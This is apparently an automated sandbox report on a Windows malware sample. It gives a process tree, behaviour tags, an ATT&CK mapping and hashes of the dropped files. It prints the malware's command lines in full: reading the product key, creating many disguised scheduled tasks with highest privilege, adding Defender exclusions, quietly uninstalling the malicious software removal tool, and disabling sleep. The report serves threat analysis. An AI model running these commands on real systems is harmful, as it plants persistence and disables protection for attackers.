C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵
-
C:\Users\Admin\AppData\Local\Temp\Msvchost.exe"C:\Users\Admin\AppData\Local\Temp\Msvchost.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft_WindowsDefender" /tr "C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7fff8865ceb8,0x7fff8865cec4,0x7fff8865ced02⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1892,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=3228 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=4152 /prefetch:82⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\dllhost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\dllhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\dllhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 11 /tr "'C:\Webdriversession\msedge.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Webdriversession\msedge.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\Webdriversession\msedge.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\wininit.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\All Users\wininit.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\wininit.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Cookies\conhost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\Cookies\conhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Cookies\conhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Windows\security\templates\cmd.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\security\templates\cmd.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Windows\security\templates\cmd.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Webdriversession\spoolsv.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Webdriversession\spoolsv.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Webdriversession\spoolsv.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 10 /tr "'C:\Windows\Help\msedge.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Windows\Help\msedge.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 10 /tr "'C:\Windows\Help\msedge.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Webdriversession\fontdrvhost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Webdriversession\fontdrvhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Webdriversession\fontdrvhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Photo Viewer\en-US\fontdrvhost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-US\fontdrvhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Photo Viewer\en-US\fontdrvhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Webdriversession\System.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Webdriversession\System.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Webdriversession\System.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WaaSMedicAgent.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WaaSMedicAgent.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WaaSMedicAgent.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Webdriversession\StartMenuExperienceHost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Webdriversession\StartMenuExperienceHost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Webdriversession\StartMenuExperienceHost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 7d4db10d5ea67053321c3cc5d87979af 6tMWMYUDMkOQcCpyS0MaFQ.0.1.0.0.01⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exeC:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
-
C:\Windows\system32\dialer.exedialer.exe2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 444 -p 7444 -ip 74442⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 6092 -ip 60922⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Scheduled Task/Job
1Persistence
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Microsoft.NET\RedistList\dllhost.exeFilesize
1.5MB
MD5974e08649dd258aaecd2622466d01f50
SHA1f517c75c8cfbb28cebfc2431918bb9b6a4c9b592
SHA25661650dc83094f5405c79f4662a237a31e7545a7614357587f8983fde4b99534f
SHA51209367ab5a4e1510ae5c9ef5aa5e1ec2db604993c0e1f1e81fcd5888305e8649d7ff167b16008bdcf761c3ff40ad9911ef1c80b3d662a152f78f1ea7cce2ab694
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506Filesize
330B
MD561230847d1f7d7984f7daf323cab5785
SHA13b642de1df82fe3f83149fa3157aedc589b90337
SHA25678f2f18e465cbdca2d0541c2e5148ed7144027a148be36922fdd2bea28bfe892
SHA5125dc4066fe262258869845798bcac6a2e7ad26c5c7ffe2efe52c91538cc27d7a059f4aa107b0c928f44bc4aa3e934a48be348f6d4ed8886f4619395e57e39e651
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749Filesize
330B
MD573b46ca9e64a4b62b83febb65688f8d9
SHA15fa1a134ee967a9738eff1d2da0492cfb01da98e
SHA256d44e02ba8785b9be44c88ee24c47925f373f2f1b043673fa40a5ef2f4b55d524
SHA51214a14e95db6cc5d075a90bed7b32b2e71ff3263b2716cd4b448fc0f8983edc83af09958bb9dc9ff524890473cea1c8b675cb937986d48f208d8a54b29326f255
-
C:\Users\Admin\AppData\Local\Temp\8JiVgU7WIS.tmpFilesize
56KB
MD55be7f6f434724dfcc01e8b2b0e753bbe
SHA1ef1078290de6b5700ff6e804a79beba16c99ba3e
SHA2564064b300ca1a67a3086e1adb18001c0017384b8f84ff4c0e693858889cef2196
SHA5123b470c3ad5be3dd7721548021a818034584bbd88237b1710ce52ac67e04126fff4592c02f5868ebda72f662ec8c5f7fc4d0a458f49fe5eb47e024a5c50935ee2
-
C:\Users\Admin\AppData\Local\Temp\GJSzbnZKtu.tmpFilesize
152KB
MD573bd1e15afb04648c24593e8ba13e983
SHA14dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91
SHA256aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b
SHA5126eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7
-
C:\Users\Admin\AppData\Local\Temp\JJbvOBnTFD.tmpFilesize
20KB
MD542c395b8db48b6ce3d34c301d1eba9d5
SHA1b7cfa3de344814bec105391663c0df4a74310996
SHA2565644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA5127b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exeFilesize
6.8MB
MD5ecc5e0c0d7ac645ca04f33211314c8d9
SHA1aa37e9cfcba00fc97a92d042400a12c52334a81a
SHA2560eeec0b8f84eccffe9d5e53fdc713d5e22d4c2f54e02d3f9688057411c5e3d32
SHA512bae0aecd052137932c9f87dd80e3633571fee9db1a769b25c54fe76717018bdd01facb0cae0de128d2db23c4901f19719425f21b17494ab8c5f4036b6ff2e3ef
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exeFilesize
1.8MB
MD53a1077a8cad6db75e243811ddf81ef8c
SHA1a7783026d11011d5965ed69c111db5905560bb2a
SHA256441109d5a46a83100e821e1e76a94a8a7051505f3306efde4058b7ad56b0a6df
SHA512a18c705c08eb5cd995757a509ef98aaaf0c6895b2ec3e50b7622370b3bb34473912df080486f04cb3ae01bde7c233cb057921fc613c1eee92de7ddff052e114d
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exeFilesize
6.9MB
MD520d597956e970a820ee6548305bf28fd
SHA1d8b7c9ba251fd620f79c565d0c0ca444de873562
SHA2560dfbeefe7980feb20c9e57a7360375aa85acfd6e3921e0583e6d7baa1955d019
SHA512198e32e38d79fe3f051c553094e3c41ed3dd289da5ff7b67a9e35379260734ff0b336b02f67690e563fe9b1f82119b0308a52fdf7b52f19fab316136f0ee7c06
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_crypt.exeFilesize
2.7MB
MD56daeeadf00855bb08838f08c38c70f37
SHA1c03525bd823f27a3e2acb8fe95f77d73327aca9d
SHA256109dab92d97421b95132798bcb3fbd2f0194d52426601fe21f1f1d0e77431bd7
SHA5127b8213e2fa44edb2e1999b17e199e6f72f048129879d4eb5d1a9d2cb6bf207adc7de9596aa5e6a58a56fa5ad74fe88a8cd7cb79c2176170b7ca061bb2983f61f
-
C:\Users\Admin\AppData\Local\Temp\Msvchost.exeFilesize
72KB
MD5a2c1f872ec71ca28f9db8969a0a8ec4e
SHA1b83df55b2f704f6b43d04600fbf6df0047cc0902
SHA256b7c0a7c25e063ef21e8ed369ba56e2442b6ca62411d9f21f3da70dc07319909f
SHA512f75e982936458beed9306865bc47c272f1520a12f2fe62d527e1da031f6e3e47b739ce9323db0ebc45e7f1ce23f6746a1d09282b978c372b5a2fbe38c5e9f057
-
C:\Users\Admin\AppData\Local\Temp\P9XwaY7Nws.tmpFilesize
192KB
MD533e87f5d0e5645e6f557843ecff1782a
SHA1ce98d09c644855980814d38f2f939eab1e2c6804
SHA256feec4df983b642f525103a428196ca70d3cb3aaa723eee3ae1ca8015dd91b0f4
SHA512dcb8c666b13c55532b9dec864be1ae3074dacd4d2ebb4631ed39f27681abcb87cdf33813829ab6b28901523099d16fa09e978736cce54c0b3837312a8c05c34d
-
C:\Users\Admin\AppData\Local\Temp\QegiaG0iCe.tmpFilesize
46KB
MD58f5942354d3809f865f9767eddf51314
SHA120be11c0d42fc0cef53931ea9152b55082d1a11e
SHA256776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218
-
C:\Users\Admin\AppData\Local\Temp\SIp2Q7iTL5.tmpFilesize
228KB
MD51b1f2093c7a02a2759dbc4e0fb792034
SHA176d70605a9beeb55dd03ddb1421eec24aea94349
SHA2563cfeee32cbb437a8576e71979239990d5571c45b47203e91452a837fd445d490
SHA512e07943d5ffbf2655325342cf23368df46321e351cd84bfefcd7e6f62032700d5d80fe818d3aa53a9ccde66c81b86e2cc50e7aaa04ed27e94db97224d9fbed082
-
C:\Users\Admin\AppData\Local\Temp\_MEI28522\VCRUNTIME140.dllFilesize
106KB
MD54585a96cc4eef6aafd5e27ea09147dc6
SHA1489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286
-
C:\Users\Admin\AppData\Local\Temp\_MEI28522\_bz2.pydFilesize
48KB
MD5554b7b0d0daca993e22b7d31ed498bc2
SHA1ea7f1823e782d08a99b437c665d86fa734fe3fe4
SHA2561db14a217c5279c106b9d55f440ccf19f35ef3a580188353b734e3e39099b13f
